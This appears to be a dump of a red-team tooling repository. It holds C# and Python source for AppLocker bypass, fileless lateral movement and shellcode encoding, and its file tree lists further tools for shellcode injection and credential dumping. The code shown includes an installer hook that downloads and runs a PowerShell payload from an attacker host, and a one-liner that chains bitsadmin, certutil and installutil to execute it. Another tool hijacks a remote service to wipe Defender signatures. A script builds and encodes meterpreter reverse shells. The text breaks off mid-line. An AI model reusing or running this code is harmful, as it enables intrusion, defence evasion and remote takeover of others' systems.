├── .gitignore ├── AppLocker Bypass PowerShell Runspace ├── App.config ├── AppLocker Bypass PowerShell Runspace.csproj ├── AppLocker Bypass PowerShell Runspace.sln ├── Program.cs ├── Properties │ └── AssemblyInfo.cs └── README.md ├── Fileless Lateral Movement ├── App.config ├── Fileless Lateral Movement.csproj ├── Fileless Lateral Movement.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── Linux Shellcode Encoder └── shellcodeCrypter.py ├── Linux Shellcode Loaders ├── sharedLibrary_LD_LIBRARY_PATH.c ├── sharedLibrary_LD_PRELOAD.c ├── simpleLoader.c └── simpleXORencoder.c ├── MSSQL ├── App.config ├── MSSQL.csproj ├── MSSQL.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── MiniDump ├── App.config ├── MiniDump.csproj ├── MiniDump.ps1 ├── MiniDump.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── PrintSpoofer.NET ├── App.config ├── PrintSpoofer.csproj ├── PrintSpoofer.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── README.md ├── ROT Shellcode Encoder ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── ROT Shellcode Encoder.csproj └── ROT Shellcode Encoder.sln ├── Sections Shellcode Process Injector ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Sections Shellcode Process Injector.csproj └── Sections Shellcode Process Injector.sln ├── Shellcode Process Hollowing ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Shellcode Process Hollowing.csproj └── Shellcode Process Hollowing.sln ├── Shellcode Process Injector ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Shellcode Process Injector.csproj ├── Shellcode Process Injector.ps1 └── Shellcode Process Injector.sln ├── Simple Shellcode Runner ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Simple Shellcode Runner.csproj ├── Simple Shellcode Runner.ps1 ├── Simple Shellcode Runner.sln └── Simple Shellcode Runner.vba └── XOR Shellcode Encoder ├── App.config ├── Program.cs ├── 
Properties └── AssemblyInfo.cs ├── XOR Shellcode Encoder.csproj └── XOR Shellcode Encoder.sln /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.vspscc 94 | *.vssscc 95 | .builds 96 | *.pidb 97 | 
*.svclog 98 | *.scc 99 | 100 | # Chutzpah Test files 101 | _Chutzpah* 102 | 103 | # Visual C++ cache files 104 | ipch/ 105 | *.aps 106 | *.ncb 107 | *.opendb 108 | *.opensdf 109 | *.sdf 110 | *.cachefile 111 | *.VC.db 112 | *.VC.VC.opendb 113 | 114 | # Visual Studio profiler 115 | *.psess 116 | *.vsp 117 | *.vspx 118 | *.sap 119 | 120 | # Visual Studio Trace Files 121 | *.e2e 122 | 123 | # TFS 2012 Local Workspace 124 | $tf/ 125 | 126 | # Guidance Automation Toolkit 127 | *.gpState 128 | 129 | # ReSharper is a .NET coding add-in 130 | _ReSharper*/ 131 | *.[Rr]e[Ss]harper 132 | *.DotSettings.user 133 | 134 | # TeamCity is a build add-in 135 | _TeamCity* 136 | 137 | # DotCover is a Code Coverage Tool 138 | *.dotCover 139 | 140 | # AxoCover is a Code Coverage Tool 141 | .axoCover/* 142 | !.axoCover/settings.json 143 | 144 | # Coverlet is a free, cross platform Code Coverage Tool 145 | coverage*.json 146 | coverage*.xml 147 | coverage*.info 148 | 149 | # Visual Studio code coverage results 150 | *.coverage 151 | *.coveragexml 152 | 153 | # NCrunch 154 | _NCrunch_* 155 | .*crunch*.local.xml 156 | nCrunchTemp_* 157 | 158 | # MightyMoose 159 | *.mm.* 160 | AutoTest.Net/ 161 | 162 | # Web workbench (sass) 163 | .sass-cache/ 164 | 165 | # Installshield output folder 166 | [Ee]xpress/ 167 | 168 | # DocProject is a documentation generator add-in 169 | DocProject/buildhelp/ 170 | DocProject/Help/*.HxT 171 | DocProject/Help/*.HxC 172 | DocProject/Help/*.hhc 173 | DocProject/Help/*.hhk 174 | DocProject/Help/*.hhp 175 | DocProject/Help/Html2 176 | DocProject/Help/html 177 | 178 | # Click-Once directory 179 | publish/ 180 | 181 | # Publish Web Output 182 | *.[Pp]ublish.xml 183 | *.azurePubxml 184 | # Note: Comment the next line if you want to checkin your web deploy settings, 185 | # but database connection strings (with potential passwords) will be unencrypted 186 | *.pubxml 187 | *.publishproj 188 | 189 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 190 | # checkin your Azure Web App publish settings, but sensitive information contained 191 | # in these scripts will be unencrypted 192 | PublishScripts/ 193 | 194 | # NuGet Packages 195 | *.nupkg 196 | # NuGet Symbol Packages 197 | *.snupkg 198 | # The packages folder can be ignored because of Package Restore 199 | **/[Pp]ackages/* 200 | # except build/, which is used as an MSBuild target. 201 | !**/[Pp]ackages/build/ 202 | # Uncomment if necessary however generally it will be regenerated when needed 203 | #!**/[Pp]ackages/repositories.config 204 | # NuGet v3's project.json files produces more ignorable files 205 | *.nuget.props 206 | *.nuget.targets 207 | 208 | # Microsoft Azure Build Output 209 | csx/ 210 | *.build.csdef 211 | 212 | # Microsoft Azure Emulator 213 | ecf/ 214 | rcf/ 215 | 216 | # Windows Store app package directories and files 217 | AppPackages/ 218 | BundleArtifacts/ 219 | Package.StoreAssociation.xml 220 | _pkginfo.txt 221 | *.appx 222 | *.appxbundle 223 | *.appxupload 224 | 225 | # Visual Studio cache files 226 | # files ending in .cache can be ignored 227 | *.[Cc]ache 228 | # but keep track of directories ending in .cache 229 | !?*.[Cc]ache/ 230 | 231 | # Others 232 | ClientBin/ 233 | ~$* 234 | *~ 235 | *.dbmdl 236 | *.dbproj.schemaview 237 | *.jfm 238 | *.pfx 239 | *.publishsettings 240 | orleans.codegen.cs 241 | 242 | # Including strong name files can present a security risk 243 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 244 | #*.snk 245 | 246 | # Since there are multiple workflows, uncomment next line to ignore bower_components 247 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 248 | #bower_components/ 249 | 250 | # RIA/Silverlight projects 251 | Generated_Code/ 252 | 253 | # Backup & report files from converting an old project file 254 | # to a newer Visual Studio version. 
Backup files are not needed, 255 | # because we have git ;-) 256 | _UpgradeReport_Files/ 257 | Backup*/ 258 | UpgradeLog*.XML 259 | UpgradeLog*.htm 260 | ServiceFabricBackup/ 261 | *.rptproj.bak 262 | 263 | # SQL Server files 264 | *.mdf 265 | *.ldf 266 | *.ndf 267 | 268 | # Business Intelligence projects 269 | *.rdl.data 270 | *.bim.layout 271 | *.bim_*.settings 272 | *.rptproj.rsuser 273 | *- [Bb]ackup.rdl 274 | *- [Bb]ackup ([0-9]).rdl 275 | *- [Bb]ackup ([0-9][0-9]).rdl 276 | 277 | # Microsoft Fakes 278 | FakesAssemblies/ 279 | 280 | # GhostDoc plugin setting file 281 | *.GhostDoc.xml 282 | 283 | # Node.js Tools for Visual Studio 284 | .ntvs_analysis.dat 285 | node_modules/ 286 | 287 | # Visual Studio 6 build log 288 | *.plg 289 | 290 | # Visual Studio 6 workspace options file 291 | *.opt 292 | 293 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 294 | *.vbw 295 | 296 | # Visual Studio LightSwitch build output 297 | **/*.HTMLClient/GeneratedArtifacts 298 | **/*.DesktopClient/GeneratedArtifacts 299 | **/*.DesktopClient/ModelManifest.xml 300 | **/*.Server/GeneratedArtifacts 301 | **/*.Server/ModelManifest.xml 302 | _Pvt_Extensions 303 | 304 | # Paket dependency manager 305 | .paket/paket.exe 306 | paket-files/ 307 | 308 | # FAKE - F# Make 309 | .fake/ 310 | 311 | # CodeRush personal settings 312 | .cr/personal 313 | 314 | # Python Tools for Visual Studio (PTVS) 315 | __pycache__/ 316 | *.pyc 317 | 318 | # Cake - Uncomment if you are using it 319 | # tools/** 320 | # !tools/packages.config 321 | 322 | # Tabs Studio 323 | *.tss 324 | 325 | # Telerik's JustMock configuration file 326 | *.jmconfig 327 | 328 | # BizTalk build output 329 | *.btp.cs 330 | *.btm.cs 331 | *.odx.cs 332 | *.xsd.cs 333 | 334 | # OpenCover UI analysis results 335 | OpenCover/ 336 | 337 | # Azure Stream Analytics local run output 338 | ASALocalRun/ 339 | 340 | # MSBuild Binary and Structured Log 341 | *.binlog 342 | 343 | # NVidia Nsight GPU debugger 
configuration file 344 | *.nvuser 345 | 346 | # MFractors (Xamarin productivity tool) working folder 347 | .mfractor/ 348 | 349 | # Local History for Visual Studio 350 | .localhistory/ 351 | 352 | # BeatPulse healthcheck temp database 353 | healthchecksdb 354 | 355 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 356 | MigrationBackup/ 357 | 358 | # Ionide (cross platform F# VS Code tools) working folder 359 | .ionide/ 360 | 361 | # Fody - auto-generated XML schema 362 | FodyWeavers.xsd 363 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385} 8 | Exe 9 | AppLocker_Bypass_PowerShell_Runspace 10 | AppLocker Bypass PowerShell Runspace 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | False 41 | ..\..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # 
Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AppLocker Bypass PowerShell Runspace", "AppLocker Bypass PowerShell Runspace.csproj", "{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {2EC8A5D7-7AA0-43D5-A631-D9AEC215E93F} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management.Automation; 3 | using System.Management.Automation.Runspaces; 4 | using System.Configuration.Install; 5 | 6 | namespace Bypass 7 | { 8 | class Program 9 | { 10 | static void Main(string[] args) 11 | { 12 | Console.WriteLine("Nothing going on in this binary."); 13 | } 14 | } 15 | [System.ComponentModel.RunInstaller(true)] 16 | public class Sample : Installer 17 | { 18 | public override void Uninstall(System.Collections.IDictionary savedState) 19 | { 20 | String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.67/run.txt') | iex"; 21 | Runspace rs 
= RunspaceFactory.CreateRunspace(); 22 | rs.Open(); 23 | PowerShell ps = PowerShell.Create(); 24 | ps.Runspace = rs; 25 | ps.AddScript(cmd); 26 | ps.Invoke(); 27 | rs.Close(); 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("AppLocker Bypass PowerShell Runspace")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("AppLocker Bypass PowerShell Runspace")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("94aedce4-d4a2-45db-b98e-860ee6be8385")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/README.md: -------------------------------------------------------------------------------- 1 | # AppLocker Bypass PowerShell Runspace 2 | 3 | We can encode this into a text file with `CertUtil`. 4 | 5 | ```powershell 6 | certutil -encode C:\Path\To\Binary.exe binary-coded.txt 7 | ``` 8 | 9 | We then run the following oneliner on the target to use the combination of Microsoft-signed binaries to effectively bypass AppLocker. 
10 | 11 | ```powershell 12 | cmd.exe /c del C:\Windows\Tasks\enc.txt && del c:\Windows\Tasks\a.exe && bitsadmin /Transfer theJob http://192.168.49.67/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe 13 | ``` -------------------------------------------------------------------------------- /Fileless Lateral Movement/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Fileless Lateral Movement/Fileless Lateral Movement.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A} 8 | Exe 9 | Fileless_Lateral_Movement 10 | Fileless Lateral Movement 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Fileless Lateral Movement/Fileless Lateral Movement.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | 
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fileless Lateral Movement", "Fileless Lateral Movement.csproj", "{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {005359DF-09A1-4FE2-8F0F-8F91C2BDE1DC} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Fileless Lateral Movement/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace PSLessExec 5 | { 6 | public class Program 7 | { 8 | public static uint SC_MANAGER_ALL_ACCESS = 0xF003F; 9 | public static uint SERVICE_ALL_ACCESS = 0xF01FF; 10 | public static uint SERVICE_DEMAND_START = 0x3; 11 | public static uint SERVICE_NO_CHANGE = 0xffffffff; 12 | 13 | [StructLayout(LayoutKind.Sequential)] 14 | public class QUERY_SERVICE_CONFIG 15 | { 16 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 17 | public UInt32 dwServiceType; 18 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 19 | public UInt32 dwStartType; 20 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 21 | public UInt32 dwErrorControl; 22 | 
[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 23 | public String lpBinaryPathName; 24 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 25 | public String lpLoadOrderGroup; 26 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 27 | public UInt32 dwTagID; 28 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 29 | public String lpDependencies; 30 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 31 | public String lpServiceStartName; 32 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 33 | public String lpDisplayName; 34 | }; 35 | 36 | [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)] 37 | public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwAccess); 38 | 39 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] 40 | static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess); 41 | 42 | [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] 43 | public static extern Boolean QueryServiceConfig(IntPtr hService, IntPtr intPtrQueryConfig, UInt32 cbBufSize, out UInt32 pcbBytesNeeded); 44 | 45 | [DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfig")] 46 | [return: MarshalAs(UnmanagedType.Bool)] 47 | public static extern bool ChangeServiceConfigA(IntPtr hService, uint dwServiceType, uint dwStartType, int dwErrorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword, string lpDisplayName); 48 | 49 | [DllImport("advapi32", SetLastError = true)] 50 | [return: MarshalAs(UnmanagedType.Bool)] 51 | public static extern bool StartService(IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors); 52 | 53 | public static void Main(string[] args) 54 | { 55 | if (args.Length != 3) 56 | { 57 | 
Console.WriteLine("Usage: PSLessExec.exe [Target] [Service] [BinaryToRun]"); 58 | Console.WriteLine("Example: PSLessExec.exe appsrv01 SensorService notepad.exe"); 59 | return; 60 | } 61 | 62 | // Open remote SCManager 63 | IntPtr SCMHandle = OpenSCManager(args[0], null, SC_MANAGER_ALL_ACCESS); 64 | Console.WriteLine($"Got handle on SCManager on {args[0]}: {SCMHandle}."); 65 | 66 | // Access target service 67 | IntPtr schService = OpenService(SCMHandle, args[1], SERVICE_ALL_ACCESS); 68 | Console.WriteLine($"Got handle on target service {args[1]}: {schService}."); 69 | 70 | // Get current binPath (two passes, first is to determine the buffer size needed) 71 | UInt32 dwBytesNeeded; 72 | QUERY_SERVICE_CONFIG qsc = new QUERY_SERVICE_CONFIG(); 73 | bool bResult = QueryServiceConfig(schService, IntPtr.Zero, 0, out dwBytesNeeded); 74 | IntPtr ptr = Marshal.AllocHGlobal((int)dwBytesNeeded); 75 | bResult = QueryServiceConfig(schService, ptr, dwBytesNeeded, out dwBytesNeeded); 76 | Marshal.PtrToStructure(ptr, qsc); 77 | String binPathOrig = qsc.lpBinaryPathName; 78 | 79 | // Pass 1: Disable Defender signatures 80 | String defBypass = "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All"; 81 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, defBypass, null, null, null, null, null, null); 82 | Console.WriteLine($"Overwrote service executable to become '{defBypass}', result: {bResult}."); 83 | 84 | // Run the service for Pass 1 85 | bResult = StartService(schService, 0, null); 86 | Console.WriteLine("Launched service, defender signatures should be wiped."); 87 | 88 | // Pass 2: Run the chosen binary 89 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, args[2], null, null, null, null, null, null); 90 | Console.WriteLine($"Overwrote service executable to become '{args[2]}', result: {bResult}."); 91 | 92 | // Run the service for Pass 2 93 | bResult = StartService(schService, 0, 
null); 94 | Console.WriteLine("Launched service. Check for execution!"); 95 | 96 | // Pass 3: Restore original binPath 97 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, binPathOrig, null, null, null, null, null, null); 98 | Console.WriteLine($"Restored service binary to '{binPathOrig}', result: {bResult}."); 99 | } 100 | } 101 | } -------------------------------------------------------------------------------- /Fileless Lateral Movement/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Fileless Lateral Movement")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Fileless Lateral Movement")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("77f955c3-4910-49ea-9cd4-cbf5ad9c071a")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Linux Shellcode Encoder/shellcodeCrypter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | # Basic shellcode crypter for C# payloads 4 | # By Cas van Cooten 5 | 6 | import re 7 | import platform 8 | import argparse 9 | import subprocess 10 | from random import randint 11 | 12 | if platform.system() != "Linux": 13 | exit("[x] ERROR: Only Linux is supported for this utility script.") 14 | 15 | class bcolors: 16 | OKBLUE = '\033[94m' 17 | OKGREEN = '\033[92m' 18 | FAIL = '\033[91m' 19 | ENDC = '\033[0m' 20 | BOLD = '\033[1m' 21 | 22 | # Parse input arguments 23 | parser = argparse.ArgumentParser() 24 | parser.add_argument("lhost", help="listener IP to use") 25 | parser.add_argument("lport", help="listener port to use") 26 | parser.add_argument("type", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor") 27 | parser.add_argument("key", help="the key to encode the payload with (integer)", type=int, nargs='?', default=randint(1,255)) 28 | parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp") 29 | args = 
parser.parse_args() 30 | 31 | # Generate the shellcode given the preferred payload 32 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Generating payload {bcolors.OKGREEN}{args.payload}{bcolors.OKBLUE} for LHOST={bcolors.OKGREEN}{args.lhost}{bcolors.OKBLUE} and LPORT={bcolors.OKGREEN}{args.lport}{bcolors.ENDC}") 33 | result = subprocess.run(['msfvenom', '-p', args.payload, f"LHOST={args.lhost}", f"LPORT={args.lport}", 'exitfunc=thread', "-f", "csharp"], stdout=subprocess.PIPE) 34 | 35 | if result.returncode != 0: 36 | exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Msfvenom generation unsuccessful. Are you sure msfvenom is installed?{bcolors.ENDC}") 37 | 38 | # Get the payload bytes and split them 39 | payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",") 40 | 41 | # Encode the payload with the chosen type and key 42 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.type}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}") 43 | for i, byte in enumerate(payload): 44 | byteInt = int(byte, 16) 45 | 46 | if args.type == "xor": 47 | byteInt = byteInt ^ args.key 48 | elif args.type == "rot": 49 | byteInt = byteInt + args.key & 255 50 | else: 51 | exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}") 52 | 53 | payload[i] = "{0:#0{1}x}".format(byteInt,4) 54 | 55 | # Format the output payload 56 | payLen = len(payload) 57 | payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL) 58 | payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n" 59 | payloadFormatted += f"// {args.type}-encoded with key {hex(args.key)}\n" 60 | payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload}\n}};" 61 | if payLen > 1000: 62 | f = 